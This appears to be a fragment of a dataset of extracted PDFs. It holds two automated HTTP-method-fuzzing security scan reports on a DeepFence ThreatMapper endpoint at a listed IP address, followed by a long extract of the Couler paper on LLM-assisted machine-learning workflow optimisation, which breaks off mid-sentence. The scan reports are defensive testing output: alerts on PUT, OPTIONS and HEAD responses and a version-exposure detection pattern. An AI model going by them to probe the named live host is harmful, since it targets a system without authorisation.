response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot PUT /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.PUT\nIssue Number #11\nScan HTTP Method Fuzzing\nSeverity ERROR\nEndpoint https://164.90.157.161/\nRequest GET https://164.90.157.161/ HTTP/1.1\nTest Step POSTModified \nParametersName Value\nmethod GET\nResponseContent-type: text/html; charset=UTF-8\n7322 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script language=\"\njavascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER__\"; </\nscript> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93DyYhHdVef+\n9c4eHxBYe+qWBLxr58e19sX7bkj10q+eDTloGQsDUTh6iOsKNDh8NTNTg5XYHN7Sb...\nAlerts\nSensitive Information Exposure: [Version x.y.z] Exposing version numbers gives \nunnecessary hints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+\n.*] found [3/3.5.16]\nValid HTTP Status Codes: Response status code: 200 is not in acceptable list of \nstatus codes\nAction Points You should check if the HTTP method should really be allowed for this resource.GET\nIssue Number #12" } ]
{ "category": "Provisioning", "file_name": "Security Report for Security Test 1 2021-04-19 15_48_09.pdf", "project_name": "ThreatMapper", "subcategory": "Security & Compliance" }
[ { "data": "Issues report for Security Test 1\nin REST Project 3/https://164.90.157.161 Test Suite/https://164.90.157.161 Test Case 1\nSummary\nStarted at 2021-04-19 15:48:09\nTime taken 00:00:28.514\nTotal scans performed: 209\nIssues found: 2\nScan Issues Found In Test StepsTotal Issues \nFound\nHTTP Method \nFuzzingRequest 1 2 2\nDetailed Info\nIssues are grouped by Security scan.\nHTTP Method Fuzzing\nAn HTTP Method Fuzzing Scan attempts to use other HTTP verbs (methods) than those defined in \nan API. For instance, if you have defined GET and POST, it will send requests using the DELETE \nand PUT verbs, expecting an appropriate HTTP error response and reporting alerts if it doesn't \nreceive it.\nSometimes, unexpected HTTP verbs can overwrite data on a server or get data that shouldn't be \nrevealed to clients.\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/deepfence/v1.5/scope\nRequest OPTIONS https://164.90.157.161/deepfence/v1.5/scope HTTP/1.1\nTest Step Request 1\nModified \nParametersName Value\nmethod OPTIONS\nResponseContent-type: text/plain\n2 Content length: \nFull response:\nok\nAlerts Valid HTTP Status Codes: Response status code: 200 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource. OPTIONS\nIssue Number #1\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/deepfence/v1.5/scope\nRequest HEAD https://164.90.157.161/deepfence/v1.5/scope HTTP/1.1\nTest Step Request 1\nModified \nParametersName Value\nmethod HEAD\nResponse No content\nAlerts Valid HTTP Status Codes: Response status code: 200 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.HEAD\nIssue Number #2" } ]
{ "category": "Provisioning", "file_name": "Tech-Report-of-Couler-Unified-Machine-Learning-Workflow-Optimization-in-Cloud.pdf", "project_name": "Couler", "subcategory": "Automation & Configuration" }
[ { "data": "Couler: Unified Machine Learning Workflow\nOptimization in Cloud\nXiaoda Wang§, Yuan Tang†, Tengda Guo§, Bo Sang∗\nJingji Wu∗, Jian Sha∗, Ke Zhang∗, Jiang Qian∥, Mingjie Tang§\n∗Ant Group†Red Hat, Inc.∥Snap, Inc§Sichuan University\n{wangxiaoda, guotengda }@stu.scu.edu.cn, {tangrock, terrytangyuan }@gmail.com,\n{b.sang, jingji.wjw, shajian, yingzi.zk }@antgroup.com\nAbstract —Machine Learning (ML) has become ubiquitous,\nfueling data-driven applications across various organizations.\nContrary to the traditional perception of ML in research,\nML workflows can be complex, resource-intensive, and time-\nconsuming. Expanding an ML workflow to encompass a wider\nrange of data infrastructure and data types may lead to larger\nworkloads and increased deployment costs. Currently, numerous\nworkflow engines are available (with over ten being widely\nrecognized). This variety poses a challenge for end-users in terms\nof mastering different engine APIs. While efforts have primarily\nfocused on optimizing ML Operations (MLOps) for a specific\nworkflow engine, current methods largely overlook workflow\noptimization across different engines.\nIn this work, we design and implement COULER , a system\ndesigned for unified ML workflow optimization in the cloud.\nOur main insight lies in the ability to generate an ML work-\nflow using natural language (NL) descriptions. We integrate\nLarge Language Models (LLMs) into workflow generation, and\nprovide a unified programming interface for various workflow\nengines. This approach alleviates the need to understand various\nworkflow engines’ APIs. Moreover, COULER enhances workflow\ncomputation efficiency by introducing automated caching at\nmultiple stages, enabling large workflow auto-parallelization and\nautomatic hyperparameters tuning. These enhancements mini-\nmize redundant computational costs and improve fault tolerance\nduring deep learning workflow training. COULER is extensively\ndeployed in real-world production scenarios at ANTGROUP ,\nhandling approximately 22k workflows daily, and has successfully\nimproved the CPU/Memory utilization by more than 15% and\nthe workflow completion rate by around 17%.\nIndex Terms —Machine Learning Workflow, LLM, Cloud\nI. I NTRODUCTION\nA workflow, commonly known as a data pipeline, entails a\nsequence of steps that process raw data from various sources,\ndirecting it to a destination for both storage and analysis. Simi-\nlarly, an ML workflow streamlines the comprehensive MLOps\nworkflow, spanning data acquisition, exploratory data analysis\n(EDA), data augmentation, model creation, and deployment.\nPost-deployment, this ML workflow facilitates reproducibility,\ntracking, and monitoring. Such workflows enhance the effi-\nciency and management of the entire model lifecycle, leading\nto accelerated usability and streamlined deployment [27], [42].\nTo automate and oversee these workflows, ML orchestration\ntools are deployed, offering an intuitive and collaborative\ninterface.\nMingjie Tang, Yuan Tang, and Qian Jiang performed most of this work\nwhile at Ant Group.\nWorkflow Definition\nDeveloper\nEngines\nProgramming API \nWorkflowWorkflow Optimization\nDataLSTM\nGRU\nSVMPre LSTM Eval ...\nRepo\nHyperparameters\nOptimizationWorkflow \nParallelismPreData Caching3\n2 1Fig. 1: An example of a financial company’s journey in\nleveraging machine learning to predict market trends.\nExample. Refer to the example in Figure 1, a financial com-\npany aims to predict market trends using ML models. Initially,\ndevelopers are tasked with selecting a workflow engine from\na variety of available options, such as Argo, Airflow, Dolphin\nScheduler, MetaFlow or Kubeflow Pipeline etc. Then, end\nusers need to dedicate time to mastering the programming API\nof specific workflow engines. Upon defining the workflow, the\nfirst step entails data preprocessing. Subsequently, three mod-\nels are evaluated, and the most promising model, LSTM, is\nselected for further analysis. The preprocessed data is reloaded\nfor subsequent analysis, culminating in the generation of a\npredictive report through a complex process. To implement\nthis, the following challenges must be addressed:\n•How can a workflow description be automatically trans-\nlated to an ML workflow? For execution, developers\nmust code the workflow to be compatible with different\nworkflow engines. However, the guidelines for different\nworkflow engines can vary significantly, posing a chal-\nlenge to become proficient in all of them.\n•How can the built workflow be effectively optimized?\nGiven a well-defined workflow, optimization is crucial.\nDevelopers need to find the optimal hyperparameters for\ntraining the ML models, and manage workflow paral-\nlelism manually. In the absence of caching, both the data\nloader and intermediate results become critical points,\npotentially slowing down the process.\nGoals and challenges. Given the ML workflow description\nand available resources, our objective is to autonomously con-struct a workflow that reduces dependence on expert knowl-\nedge. Simultaneously, we aim to enhance overall efficiency by\nminimizing end-to-end workflow execution costs. We strive\nto streamline the ML workflow creation process and ensure\noptimal utilization of available resources, making the entire\nsystem more user-friendly and efficient.\nEffectively orchestrating workflows is crucial for companies\nheavily invested in machine learning. Consequently, a devel-\noper needs to understand the programming API of the selected\nworkflow engine and learn to automate and optimize the entire\nworkflow manually. Numerous widely used workflow engines\nexist, such as Argo Workflows [5], Tekton Pipelines [44], and\nApache Airflow [2]. The necessity to master multiple workflow\nengines presents a significant challenge for developers due\nto the unique programming interface of each engine. With\nthe advent of LLMs, significant strides has been made in the\nrealms of natural language to SQL conversion [15], [37], [43],\ncode generation from natural language descriptions [30], [54]\nand database performance tuning [24]. This advancement facil-\nitates the efficient conversion of natural language descriptions\ninto programming coding across different workflow engines,\nthereby simplifying the workflow definition process. However,\nseveral challenges remain:\nGiven the myriad of available workflow engines, attempting\na direct translation from NL to various workflow engine codes\nproves to be intricate and inefficient. Factors such as the\ncontinual evolution of workflow engine APIs and the distinct\ndesign philosophy behind each engine contribute to this com-\nplexity. Additionally, LLMs may not always stay updated with\nthe latest changes in these APIs, posing a challenge to ensure\naccurate NL to code translation consistently. This scenario\naccentuates the need for a unified coding interface catering\nto different workflow engines. Such an interface simplifies\nthe process of defining and managing workflows without\ndelving into the intricacies of each engine, thereby enhancing\nthe efficiency of LLMs in translating NL descriptions into\nexecutable code.\nAfter establishing a workflow, optimizing its computational\naspects is crucial. One challenge is to effectively cache in-\ntermediate results dynamically, maximizing resource use and\nminimizing runtime. Storing crucial intermediary outputs al-\nlows workflows to gracefully handle runtime errors without the\nneed to restart from scratch. Moreover, splitting large work-\nflows into smaller, more manageable segments is not straight-\nforward. It demands careful strategizing to strike a balance\nbetween performance and resource use. In ML workflows,\nhyperparameter optimization of the models introduces another\nlayer of complexity. Identifying the optimal hyperparameter\nvalues is a complex process, and leveraging the capabilities\nof LLMs to automate this process, while promising, remains\na significant challenge.\nContributions. To address these challenges, the contributions\nof this work are outlined below:\n•Simplicity and Extensibility : We provide a unified pro-\ngramming interface for workflow definition, ensuring inde-\npendence from the workflow engine and compatibility withvarious workflow engines such as Argo Workflows, Airflow,\nand Tekton. We demonstrate how C OULER supports ML\nmodel selection and AutoML pipelines.\n•Automation : We integrate LLMs in unified programming\ncode generation. By leveraging LLMs, we facilitated the\ngeneration of unified programming code using NL descrip-\ntions. Additionally, we automate hyperparameters tuning\nthrough the integration of Dataset Card and Model Card,\nenhancing the effectiveness of the autoML process.\n•Efficiency : We introduce the Intermediate Representative\n(IR) to depict the workflow Directed Acyclic Graph (DAG),\noptimizing extensive workflow computations by dividing a\nlarge workflow into smaller ones for auto-parallelism opti-\nmization. We also implement dynamic caching of artifacts,\nwhich are the outputs of jobs in the workflow, to minimize\nredundant computations and ensure fault tolerance.\n•Open Source Community : We constructed the platform to\nassist data scientists in defining and managing workflows,\nenabling system deployment in real production environ-\nments on a large scale. The released open-source version has\ngarnered adoption from multiple companies and end-users *.\nFor instance, over 3000 end users are utilizing C OULER\nwithin A NTGROUP , and more than 20 companies have\nadopted C OULER as their default workflow engine interface.\nII. S YSTEM FRAMEWORK\nFigure 2 illustrates the C OULER architecture, highlighting\nvarious components and multiple aggregation layers that facili-\ntate scaling across clusters. Initially, we provide two interfaces\nfor defining workflows: one through Natural Language and the\nother through GUI, SQL, and programming languages such as\nPython and GoLang. Once a workflow is defined, it’s converted\ninto an Intermediate Representation (IR) format. Subsequently,\noptimization measures, specifically the auto hyperparameter\ntuning optimizer and workflow auto-parallelism, are employed\nto refine the workflow. Upon completion, C OULER generates\nthe final workflow which is then submitted to the designated\nworkflow engine. Concurrently, an automated caching mecha-\nnism operates in real-time, dynamically updating the cache as\nthe workflow progresses.\nA. Workflow Description\nWe offer two primary methods for users to construct work-\nflows. The first leverages Natural Language (NL) descrip-\ntions, wherein we employ LLMs, such as ChatGPT-3.5 and\nChatGPT-4, to generate code compliant with a standardized\nworkflow interface definition (§III). Simultaneously, users can\nalternatively create workflows using a Graphical User Interface\n(GUI)(§V), SQL tools like SQLFlow(§V), or directly through\nprogramming languages such as Golang or Python.\nB. Workflow DAG Generator\nWe propose a unified programming interface to define\nworkflows in a DAG way. This interface is designed to allow\nusers to delineate workflows without specific knowledge of\nthe underlying workflow engine. And it offers fundamental\n*https://couler-proj.github.io/couler/Natural Language\nSQL GUI DSLTraditional typesType 2Type 1\ncloud -based \nworkflow \nengine\nlocal -based \nworkflow\nengine...DAGOptimizer\nWorkflow \nSplitingIR generator Workflow\ngenerator\nAuto \nCachingAuto\n Hyperparameter \nTunningStatic Optimizer Dynamic Optimizer1 2 3 4 5 Input flows \nModel ParamLLM\nPod 1\nPod 2batch s, ...\nlr, ...64, ...\n0.1, ...J1 J2 J3J4\nJ5 J6Caching StorageExchange?Workflow EngineFig. 2: Overview of C OULER Architecture.\nfunctions such as executing scripts, containers, or jobs, stip-\nulating conditions, and managing multiple instances of a job,\namong others. For example, the code 1 shows how to build a\nworkflow implicitly. By this way, users need to own a clear\nbig picture for the workflow, and under how the running logic\namong steps in their real application. The definition of DAG\nworkflow via explicit way helps data engineer to debug a failed\nworkflow more easily, and build a complicated workflow with\nhundred nodes. More detailed information about the interface\nis given in Appendix A.\n1def job(name):\n2 couler.run_container(\n3 image=\"whalesay:latest\",\n4 command=[\"cowsay\"],\n5 args=[name], step_name=name)\n6\n7def diamond():\n8 couler.dag(\n9 [[lambda: job(name=\"A\")],\n10 [lambda: job(name=\"A\"), # A -> B\n11 lambda: job(name=\"B\")],\n12 [lambda: job(name=\"A\"), # A -> C\n13 lambda: job(name=\"C\")],\n14 [lambda: job(name=\"B\"), # B -> D\n15 lambda: job(name=\"D\")],\n16 [lambda: job(name=\"C\"), # C -> D])\n17 lambda: job(name=\"D\")]\n18 ])\n19diamond() / *Execute the diamond function. */\n20submitter = ArgoSubmitter()\n21/*Submit and run the workflow over Argo. */\n22couler.run(submitter=submitter)\nCode 1: An Example Workflow DAG in C OULER\nC. Workflow Intermediate Representation\nA workflow processes a stream of input data to train a\nmodel, subsequently generating a new model for machine\nlearning applications. Typically, a workflow is represented in\na DAG format. Consequently, we represent a workflow in\nan intermediate representation (IR) format, unbound to any\nspecific backend workflow engine or platform. Utilizing IR\nallows us to optimize the workflow independently of platform-related properties, enabling C OULER to assimilate workflows\nfrom the unified programming interface.\nD. Auto Tuning Optimizer and Workflow Optimizer\nWe utilize LLMs to generate recommended hyperparameter\nconfigurations for machine learning models, by analyzing\ndataset characteristics from Dataset Card and model informa-\ntion from Model Card (§IV .C). This approach automates the\nfine-tuning of hyperparameters in machine learning workflows,\nenabling LLMs to generate configurations that enhance model\nperformance. Based on the workflow’s IR, the C OULER server\nemploys a rule-based approach to formulate the optimiza-\ntion plan before initiating a workflow. The considerations\nfor this plan include optimizing large workflows, resource\nrequest optimization, and the reuse of intermediate results. All\noptimizations adhere to a predefined interface, incorporating\ntheir specific implementations. Further details regarding these\noptimizations are provided in Section (§IV .B).\nE. Automatic Caching Optimizer\nIn C OULER , artifacts are integrated as valuable products\nof workflow development, including datasets, parameters, di-\nagrams, etc. Various physical storage options are available\nand can be registered to accommodate different types of\nartifacts. We offer an Automatic Caching Mechanism based\non the artifact to dynamically update the cache during work-\nflow execution (§IV .A). For each currently executing pod, a\ncomprehensive analysis is conducted across three dimensions:\npast usage, future usage, and the cost-effectiveness of caching.\nThis analysis yields a cache value score, used to re-evaluate\nthe existing cache content. This re-evaluation helps determine\nwhether updates need to be made to the cache.\nF . Workflow Generator and Workflow Engines\nCOULER aims to enable workflows to operate across various\nplatforms, with a particular focus on cloud-native processing.\nTo accelerate execution, we aim to support workflow genera-\ntion tailored to specific platforms. As a result, the final phase\nof C OULER optimization involves generating workflows to\nexecute on distinct workflow engines. The workflow generator\nconverts the intermediate representation of a DAG to anexecutable format. Then, a workflow engine like Argo can\nexecute this format (e.g., YAML format for Argo workflow).\nThis YAML is then sent to the Argo operator within a\nKubernetes cluster, demonstrating how the abstraction of IR\nallows for flexibility in supporting various workflow engines.\nIn Kubernetes, the workflow engine operates as a workflow\noperator. Initially, this operator allocates the associated Kuber-\nnetes resources (i.e., Pods) according to the resource definition\nfor a step in a workflow, and then monitors the status of\nsteps, updating the workflow status as needed. The execution\ntopology of the workflow is dictated by the workflow’s DAG,\nwith the workflow operator scheduling the relevant steps in\nthe cluster based on the status of steps and the DAG.\nIII. NL TOUNIFIED PROGRAMMING INTERFACE\nIn this section, we explore the application of LLMs for\nconverting Natural Language (NL) to Unified Programming\nInterface as shown in Section(§III.B). Traditional methods\ninvolve defining workflows using various techniques and sub-\nmitting them to a cluster. Lately, LLMs have demonstrated\nremarkable performance across a wide array of inference\ntasks. However, upon direct application of LLMs for unified\nprogramming code generation, certain challenges arise: Firstly,\nthe overall workflow complexity hampers the performance\nof LLMs in complete workflow conversion. Secondly, LLMs\npossess limited knowledge regarding C OULER ’s unified pro-\ngramming interface.\nTo address these challenges, we introduce a method that\nleverages LLMs to automatically translate natural language\ninto unified programming code via the crafting of task-specific\nprompts. This approach enables users to articulate their desired\nworkflows in natural language, which are then automatically\ntranslated into executable unified programming code. As a\nresult, our method simplifies the C OULER workflow creation\nprocess and improves usability for individuals with limited\nprogramming experience, as illustrated in Figure 3. We also\nintroduce this procedure through a running example in Sec-\ntion (§V .D). The transition from NL descriptions to C OULER\ncode encompasses four pivotal steps:\nStep 1: Modular Decomposition : Initially, we employ a\nchain of thought strategy [50] to decompose natural language\ndescriptions into smaller, more concise task modules, such\nas data loading, data processing, model generation, and eval-\nuation metrics. Each module should encapsulate a singular,\ncoherent task to ensure the precision and correctness of the\ngenerated C OULER code. A series of predefined task types\ncan be established to identify and extract pertinent tasks based\non the input of natural language descriptions automatically.\nThey provide a structured approach to ensure the precision\nand correctness of the code generated.\nStep 2: Code Generation : For each independent subtask, we\nutilize LLMs to generate code. Considering that LLMs have\nlimited knowledge about C OULER , we construct a Code Lake\ncontaining code for various functions. We search for relevant\ncode from the Code Lake for each subtask and provide it to\nWorkflow Description\nUnified Programming CodePrompt I have a NL description ... Step 1: Modular Decomposition\nChain-of-Thought\nSubtask in Chains\n1 2 n ...\n1Step 2: Code Generation\n2 n ...\nCode Lake\nStep 3: Self-calibration\nStep 4: User Feedback\nCode_1 Code_2 Code_n\nWhen users execute the generated workflow code, they can submit feedback or\nsuggest modifications to the LLM.I have generated some code for a\nspecific task. Can you evaluate it\nand provide a score...Code_1\n Code_1 2Code_2 nCode_n Code_n ...\nCode_1 Code_2 Code_n ...1 Prompt + Prompt + Prompt + \n Critique RepeatFig. 3: NL to Unified Programming Interface\nLLMs for reference. This significantly improves the ability for\nunified programming code generation.\nAlgorithm 1 NL to Unified Programming Interface\nInput: Description D, LLM L, Baseline Score Sb\nOutput: Executable C OULER CodeC\n1:Modular Decomposition: chain of thought to decom-\npose NL description Dinto smaller chains di\n2:foreach subtask diin chains do\n3: Generate Subtask Code:\n4: Search for relevant code as reference\n5: UseLto generate code cifor the subtask di\n6: Self-calibration:\n7: Compute score siforcileveraging L\n8: while si< Sbdo\n9: Re-generate subtask code and update si\n10: end while\n11:end for\n12:User Feedback: review and validate the generated unified\nprogramming code\nStep 3: Self-calibration : After generating the code for each\nsubtask, we integrate a self-calibration strategy [47] to opti-\nmize the generated code. This strategy evaluates the generated\ncode by having LLMs critique it, as shown in Algorithm 1. In\nline 8, there may be complex scenarios in which achieving\nthe desired score is impractical for various reasons. Users\ncan adjust Baseline Score in instances where it is set too\nambitiously, rendering it unattainable. Initially, we define abaseline score Sbas the standard evaluation score. We use\nLLMs to evaluate the generated code cifor a score sibetween\n0 and 1, and if si< Sb, we will provide feedback of LLMs\nand repeat the code generation. After this self-calibration, we\nwill have improved code for each subtask.\nStep 4: User Feedback : Finally, users can review and validate\nthe generated workflow code. If the generated code fails\nto meet the users’ requirements, they have the opportunity\nto provide feedback and suggestions in textual format. The\nsystem will leverage this feedback to optimize the code and\nenhance the precision of code generation.\nIV. W ORKFLOW OPTIMIZATION\nIn this section, we present three optimizations implemented\nat A NTGROUP to enhance workflow efficiency. Firstly, we\nintroduce an artifact auto-caching mechanism to eliminate\nredundant computations. Secondly, for workflows comprising\nthousands of nodes, we propose a heuristic approach to\npartition large workflows into smaller units, thereby maximiz-\ning workflow parallelism. Lastly, we introduce an automatic\nhyperparameters tuning method based on LLMs to automate\nthe training pipeline of ML workflows.\nA. Automatic Artifact Caching Mechanisms\nTABLE I: Set of common notations used in our description.\nNotation Definition\nG DAG of workflow (G=⟨J, E, C ⟩)\nJobs J, Edges E, Configurations C\nA Adjacency matrix of a directed graph G\nJs, Jp Serial and Parallel Job Sets\nu Artifact u\nL The reconstruction cost of artifacts\nF The utility value of artifacts\nV The cache cost of artifacts\nI The cache assessment metrics of artifacts\nNc List of cached artifacts: {u1, ..., u i}\nt, s Computation Time and space usage of Jobs\nMotivation of Caching. Machine learning model develop-\nment is a highly iterative process, often involving repeated\nsteps with variations. This iterative nature can lead to sig-\nnificant duplicated work, especially concerning data import\nand transformation. By caching intermediate results, such as\npreprocessed data or feature representations, data scientists\ncan avoid redundant computations across iterations, thus ac-\ncelerating the development process. This increased iteration\nspeed translates into higher productivity, allowing problems\nto be solved faster and empowering data scientists. However,\ncaching introduces additional overhead e.g., storage costs. In\nthis work, we introduce the way to strike the right balance\nbetween storage overhead and computational cost savings in\nANTGROUP .\n1) Problem Statement and Evaluation Metrics: Caching all\nintermediate data (called artifacts in this work) is an instinctive\napproach, but it comes with challenges. Firstly, not all data\nmerits caching, especially if it is not slated for reuse in the\nforeseeable future. Secondly, the associated costs of caching\ncan be prohibitive. For instance, at A NTGROUP , we delegateintermediate artifact storage to distributed in-memory systems\nlike Apache Alluxio [25]. Given the finite memory capacities\nof such systems, making judicious decisions about which\nartifacts to cache is crucial. This necessitates an automatic\nselection mechanism that factors in the caching expense cost\nwhen determining which data to store.\nThus, we prioritize workflow execution time and memory\nconsumption as the pivotal performance metrics and targets for\noptimization. Specifically, we define the workflow execution\ntime, represented as T, as the duration required for completing\nthe Critical Path. This Critical Path is characterized as the\nelongated sequence of interdependent tasks spanning from the\ninception to the culmination of the workflow as in [56]. On\nthe other hand, the metric for memory expenditure, symbolized\nasS, is construed as the peak memory consumption observed\nacross all concurrently operating nodes. Based on these defi-\nnitions, the cost function can be articulated as follows:\nT= max(X\np∈Jttp) (1)\nS= max(X\np∈Jssp) (2)\nwhere tpandspis the time and memory usage for Job p.\nWe define the job groups with the longest running time and\nthe largest resource consumption as JtandJs, respectively.\n2) Principles of Automatic Caching: In this study, we\npropose a metric called the caching importance factor to\nascertain the significance of caching a specific artifact (namely\nu). This factor serves as a guiding principle to dynamically\ndetermine which artifact warrants caching. We represent this\nby a function, I(u), which computes the caching importance\nfactor for artifact u. Our formulation of this metric is primarily\ninfluenced by three determinants: the cost of reconstructing\nthe artifact, denoted as L; the expected value of reusing\nthe artifact, represented as F; and the associated expense of\ncaching, labeled V. Details are presented below.\nArtifact reconstruction cost: refers to the expense incurred\nwhen re-creating or regenerating machine learning artifacts or\nintermediate results that were not cached or saved during the\nworkflow. When these artifacts are not cached or saved, and\nthey need to be reconstructed from raw data or recomputed,\nit can result in additional computational expenses, increased\nexecution time, and potentially higher resource usage. Mini-\nmizing artifact reconstruction costs is one of the objectives of\neffective caching strategies in ML workflows.\nIn this research, given an artifact u, we focus on analyzing\nthe subgraph containing nodes that serve as predecessors to\nartifact u, which we refer to as Gp={J1, ..., J s}. Note that,\nto simplify our discussion in this work, we only consider\nsubgraphs with the following properties: (a) We select the\nsubgraph Gp, formed by the preceding nlayers of jobs from\nnode u, as it is the most representative. (b)If the artifact\nof a job within Gpis cached, Gpwill be truncated at that\npoint. On this basis, we hope to minimize the related artifact\nreconstruction cost L(u). Within this subgraph Gp, the costL(u)is determined by the computational resources utilized\nby jobs and the storage resources associated with the artifacts\ninvolved. Formally, L(u)is defined as follow way:\nL(u) =sX\ni=1sX\nj=1Aij·(wi+di·dj) (3)\nwhere, Adenote the adjacency matrix, respectively. wirep-\nresents the resource consumption of job i. The degree di\nindicates the level of significance for job i, and srepresents\nthe number of nodes in Gp. By this way, we formulate the\noverall runtime complexity of Gp, taking into account the\nvarying importance of each node.\nArtifact reuse value: refers to the benefits and advantages\ngained by reusing previously generated artifacts (e.g., prepro-\ncessed data, feature representations, or model checkpoints) in\na machine learning workflow. The value comes from avoiding\nredundant computations and leveraging the work done in\nearlier stages of the workflow, ultimately leading to resource\nsavings and more efficient model development. Maximizing\nthe reuse value is another optimization target in this work.\nGiven an artifact u, the artifact reuse value name as F(u)is\ninfluenced via the successor of workflow graph. This graph is\nreferred as Gswhose definition is the same as Gp. Within this\nsubgraph Gs={J1, ..., J t}, we hope to maximize the artifact\nreuse value F(u)as following way.\nF(u) =tX\ni=1r\nκui·(ζui+ 1) (4)\nWhere κuirepresents distance for node uand node iin the\nsubgraph Gs,rrepresents a boolean state indicating whether\na reuse event occurs for artifact uandtrepresents the number\nof nodes in Gs. Then, ζuiis the weighted value for the\ndependency of job ionu. Given the adjacency matrix as A\nand the degree of nodes as d. We use diag to represent the\ndiagonal matrix, and matrix ζcan be computed as follow:\nζ=diag[d1, ..., d n]−A (5)\nArtifact caching cost: refers to the expenses associated\nwith storing and managing cached artifacts or intermediate\nresults in a machine learning workflow. In this work, we use\nthe distributed in-memory storage to store the artifact, thus, we\nmainly consider u’s memory consumption (name as V(u)).\nOverall, given a artifact u, we formalize the caching impor-\ntance factor ofuas follow:\nI(u) =α·log(1 + L(u)) +β· F(u)2−e−V(u)(6)\nwhere αandβare weight parameters for the metrics, and\ntheir optimal values are selected through experimental studies\nin the production environment. The αandβare used to\nadjust the weights among the three factors: reconstruction cost,\nreuse value, and cache cost. As the impact of these factors on\nefficiency varies in different training scenarios, it is necessary\nto adjust them according to the actual situation.\nThe caching importance factor plays a crucial role in\ndeciding whether a new artifact should replace an existingAlgorithm 2 Automatic Caching Mechanisms\n1:Input: JobSet N, Workflow G, Artifact Cached List Nc,\nUsed Caching Storage Cu, Total Caching Storage Ct\n2:Output: Dynamic Caching Set Dc\n3:function L(u)→Returns artifact reconstruction cost of u\n4:function F(u)→Returns artifact reuse value of u\n5:function V(u)→Returns artifact caching cost of u\n6:function I(l,f,v)→Returns caching importance factor\nofu\n7:Cu← ∅,Nc← ∅\n8:markUnVisited( G)\n9:for all u∈ N do\n10: ifnot Visited( u) and Cu< Ctthen\n11: u→Nc\n12: else if not Visited( u) and Cu≥Ctthen\n13: NodeSelection( u,G,Nc,Cu,Ct)\n14: end if\n15:end for\n16:function NODESELECTION (u,G,Nc,Cu,Ct)\n17: for all u∈Ncdo\n18: vi← V (u) ▷V(u):memory consumption\n19: li← L (u) ▷using Eq. (3)\n20: fi← F (u) ▷using Eq. (4)\n21: Ii← I (li,fi,vi) ▷using Eq. (6)\n22: end for\n23: MarkVisited( u)\n24: while Cu> Ctdo\n25: umin←arg min ui∈NcIi\n26: ifumin̸=uthen\n27: uinNc,umin outNc\n28: else\n29: uioutNc\n30: end if\n31: update Cu\n32: end while\n33:end function\none in the cache memory. This factor is instrumental in\nenabling C OULER to maximize execution time efficiency while\nworking within the constraints of limited cache space. We\nwill recompute the caching importance factor of all remaining\nitems in the Caching Storage whenever an item is removed.\nIn this way, we hope to reduce the communication overhead\nin the workflow and the reconstruction cost when artifacts are\nreused, thereby decreasing the overall runtime T. We introduce\nthe Algorithm 2 to determine which artifacts should be cached\nduring the caching process based on the constraint.\nTo make optimal cache exchange decisions, C OULER ’s\ndynamic caching module calculates the caching value of newly\ngenerated artifacts during the workflow execution process.\nAlgorithm 2 provides an overview of how the dynamic caching\nstrategy module makes cache decisions and optimizes execu-\ntion time efficiency. The monitor attempts to place newly gen-\nerated artifact into the cache (line 11). If there is insufficient\ncache space, we calculate a cache score based on the attributesof the new artifact (line 16-21). This score is then compared\nto the scores of artifacts already in the cache (line 24-30),\ndetermining whether to remove an existing cached artifact.\nThis process is repeated until there is enough cache storage\navailable or the score of the new artifact is lower than the\ncompared score.\nJ1 J2 J3 J5\nJ6 J7J9\nJ8J4\nArtifact\na1Attributes\nattr1, ...Score\n77.2\na3 attr1, ... 81.4\nCaching StorageCache Score TableWorkflow\nJ1 J2 J3 J5\nJ6 J7J9\nJ8J4\nCaching StorageCache Score TableWorkflowCache Updatea1 a3 a5\na5 attr1, ... 74.7\na1 a3 a6Artifact\na1Attributes\nattr1, ...Score\n77.2\na3 attr1, ... 81.4\na6 attr1, ... 79.6a1 a2a4\na3\na3a5\na6a7a8\na1 a2a4\na3\na3a5\na6a7a8\na5J:Job\na:Artifact\nFig. 4: Running Example of Automatic Caching\n3) Running Example of Automatic Caching: Figure 4\npresents a running example for the caching strategy in this\nwork. In the workflow, the green sections represent the Jobs\nthat have completed execution, the yellow sections indicate\nthe Jobs currently in execution, and the blue sections denote\nthe Jobs awaiting execution. Arrows represent the dependency\nrelationships between Jobs. The Cache Score Table maintains\nrecords of the size, type, and other attributes of cached\nartifacts, as well as their cache scores. Note that caching\nstorage refers to the cache space allocated for the workflow.\nUpon the completion of J6, COULER calculates the cache\nscore for artifact a6based on the attribution of a6. Subse-\nquently, C OULER attempts to store artifact a6in the Caching\nStorage. If the remaining space is to be insufficient for a6,\nCOULER compares a6’s cache score with that of a5, which has\nthe lowest score in the Cache Score Table. Due to a6’s score\nis higher than a5,a5is replaced by a6. If the Caching Storage\nis still inadequate, the comparison continues with the artifact\nhaving the next lowest score, 